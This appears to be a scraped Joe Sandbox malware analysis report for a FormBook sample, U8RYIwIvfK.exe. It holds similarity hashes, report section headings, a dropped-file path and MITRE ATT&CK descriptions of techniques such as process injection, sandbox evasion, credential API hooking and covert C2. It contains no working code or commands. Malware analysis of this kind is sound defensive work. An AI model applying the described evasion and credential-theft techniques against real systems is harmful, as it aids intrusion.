Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: iswspacewcschr
String ID: =,;
API String ID: 287713880-1539845467
Opcode ID: f660fb1a3d1458a4ed9e0bc5a8d1f4598fbdcbfafb1df146ac7f612329b38e29
Instruction ID: a1a48b0287cff06763e50cb7da6564446d14c87c21d6aaa8163ba8d64b082eae
Opcode Fuzzy Hash: f660fb1a3d1458a4ed9e0bc5a8d1f4598fbdcbfafb1df146ac7f612329b38e29
Instruction Fuzzy Hash: 0FE04F37A0C52292473C1A1EB8199F796D9DBEAB2132B001FF80293590FB618C439590

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	AWS CloudTrail logs, Authentication logs, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report U8RYIwIvfK.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\U8RYIwIvfK.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
U8RYIwIvfK.exe

Function 00A98188 Relevance: 1.7, Strings: 1, Instructions: 459
COMMON

Function 00A98178 Relevance: 1.7, Strings: 1, Instructions: 418
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre